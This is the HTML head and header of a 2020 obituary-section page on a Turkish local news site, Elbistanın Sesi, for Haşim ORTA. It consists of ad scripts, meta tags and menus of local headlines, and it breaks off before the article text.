
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Anma/ Haşim ORTA</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content=""> <meta name="keywords" content="Anma/ Haşim ORTA"> <meta name="news_keywords" content="Anma/ Haşim ORTA"> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Anma/ Haşim ORTA"> <meta property="og:description" content=""> <meta property="og:url" content="http://www.elbistaninsesi.com/vefatlar/anma-hasim-orta-h67346.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2020/08/anma_hasim_orta_h67346_54f64.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Anma/ Haşim ORTA"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/vefatlar/anma-hasim-orta-h67346.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Anma/ Haşim ORTA"> <meta name="twitter:description" content=""> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2020/08/anma_hasim_orta_h67346_54f64.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2020/08/anma_hasim_orta_h67346_54f64.jpg" /> <meta itemprop="headline" content="Anma/ Haşim ORTA" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/anma_hasim_orta_h67346_54f64.jpg" /> <meta itemprop="articleSection" content="Vefatlar" name="section" /> <meta itemprop="dateCreated" content="2020-08-05T15:14:41+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2020/08/anma_hasim_orta_h67346_54f64.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="Anma/ Haşim ORTA" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <script data-ad-client="pub-3633419220222736" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">7.2420</span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate">8.5968</span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate">478.296</span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate">1034</span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/6-saatlik-elektrik-kesintisi-yapilacak-h67356.html" title="6 saatlik elektrik kesintisi yapılacak" >6 saatlik elektrik kesintisi yapılacak</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanda-en-kapsamli-koronavirus-denetimi-yapildi-h67354.html" title="Elbistan’da en kapsamlı koronavirüs denetimi yapıldı" >Elbistan’da en kapsamlı koronavirüs denetimi yapıldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-egitim-yatirimlarini-inceledi-h67353.html" title="Kaymakam Demir eğitim yatırımlarını inceledi" >Kaymakam Demir eğitim yatırımlarını inceledi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/anadolunun-cerenleri-180-yil-once-yasadiklari-nurhaka-geri-donuyor-h67351.html" title="Anadolu’nun ‘cerenleri’ 180 yıl önce yaşadıkları Nurhak’a geri dönüyor" >Anadolu’nun ‘cerenleri’ 180 yıl önce yaşadıkları Nurhak’a...</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/bpet-yalcin-petrol-yenilenen-yuzuyle-hizmette-h67350.html" title="Bpet Yalçın Petrol yenilenen yüzüyle hizmette" >Bpet Yalçın Petrol yenilenen yüzüyle hizmette</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/bakan-soylu-en-yogun-koronavirus-denetimini-gerceklestirecegiz-h67347.html" title="Bakan Soylu: “En yoğun koronavirüs denetimini gerçekleştireceğiz”" >Bakan Soylu: “En yoğun koronavirüs denetimini gerçekleştireceğiz”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/il-genelinde-taziye-ziyaretleri-yasaklandi-h67345.html" title="İl genelinde taziye ziyaretleri yasaklandı" >İl genelinde taziye ziyaretleri yasaklandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/uyusturucu-operasyonunda-2-kisi-tutuklandi-h67344.html" title="Uyuşturucu operasyonunda 2 kişi tutuklandı" >Uyuşturucu operasyonunda 2 kişi tutuklandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kmbbden-akulu-arac-hediye-h67342.html" title="KMBB’den akülü araç hediye" >KMBB’den akülü araç hediye</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/acik-ogretim-lisesi-ilk-kayit-ve-kayit-yenileme-takvimi-aciklandi-h67341.html" title="Açık Öğretim Lisesi ilk kayıt ve kayıt yenileme takvimi açıklandı" >Açık Öğretim Lisesi ilk kayıt ve kayıt yenileme takvimi açıklandı</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="3a26f9a27ff46bde5fb59d08b9ed5cd5213b560e" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Anma/ Haşim ORTA" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" class="current" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/abdullah-kusmus-76-yasinda-h67355.html" title="Abdullah Küsmüş 76 Yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/abdullah_kusmus_76_yasinda_h67355_08fd3.jpg" alt="Abdullah Küsmüş 76 Yaşında" /> Abdullah Küsmüş 76 Yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-ceran-h67352.html" title="Hatice Ceran"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/hatice_ceran_h67352_5cdb1.jpg" alt="Hatice Ceran" /> Hatice Ceran</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/anma-hasim-orta-h67346.html" title="Anma/ Haşim ORTA"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/anma_hasim_orta_h67346_54f64.jpg" alt="Anma/ Haşim ORTA" /> Anma/ Haşim ORTA</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/anma-mustafa-colak-h67343.html" title="Anma/ Mustafa Çolak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/anma_mustafa_colak_h67343_09819.jpg" alt="Anma/ Mustafa Çolak" /> Anma/ Mustafa Çolak</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/6-saatlik-elektrik-kesintisi-yapilacak-h67356.html" title="6 saatlik elektrik kesintisi yapılacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/6_saatlik_elektrik_kesintisi_yapilacak_h67356_af472.jpg" alt="6 saatlik elektrik kesintisi yapılacak" /> 6 saatlik elektrik kesintisi yapılacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-en-kapsamli-koronavirus-denetimi-yapildi-h67354.html" title="Elbistan’da en kapsamlı koronavirüs denetimi yapıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/elbistanda_en_kapsamli_koronavirus_denetimi_yapildi_h67354_f872a.jpg" alt="Elbistan’da en kapsamlı koronavirüs denetimi yapıldı" /> Elbistan’da en kapsamlı koronavirüs denetimi yapıldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-egitim-yatirimlarini-inceledi-h67353.html" title="Kaymakam Demir eğitim yatırımlarını inceledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/kaymakam_demir_egitim_yatirimlarini_inceledi_h67353_83883.jpg" alt="Kaymakam Demir eğitim yatırımlarını inceledi" /> Kaymakam Demir eğitim yatırımlarını inceledi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/anadolunun-cerenleri-180-yil-once-yasadiklari-nurhaka-geri-donuyor-h67351.html" title="Anadolu’nun ‘cerenleri’ 180 yıl önce yaşadıkları Nurhak’a geri dönüyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/anadolunun_cerenleri_180_yil_once_yasadiklari_nurhaka_geri_donuyor_h67351_4d617.jpg" alt="Anadolu’nun ‘cerenleri’ 180 yıl önce yaşadıkları Nurhak’a geri dönüyor" /> Anadolu’nun ‘cerenleri’ 180 yıl önce yaşadıkları Nurhak’a geri dönüyor</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" /> İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" /> AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" /> Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" /> Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" /> Filenin sultanları, Nevşehir’i ağırlayacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" /> Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" /> Mikrokredi desteği koronavirüs döneminde de devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> 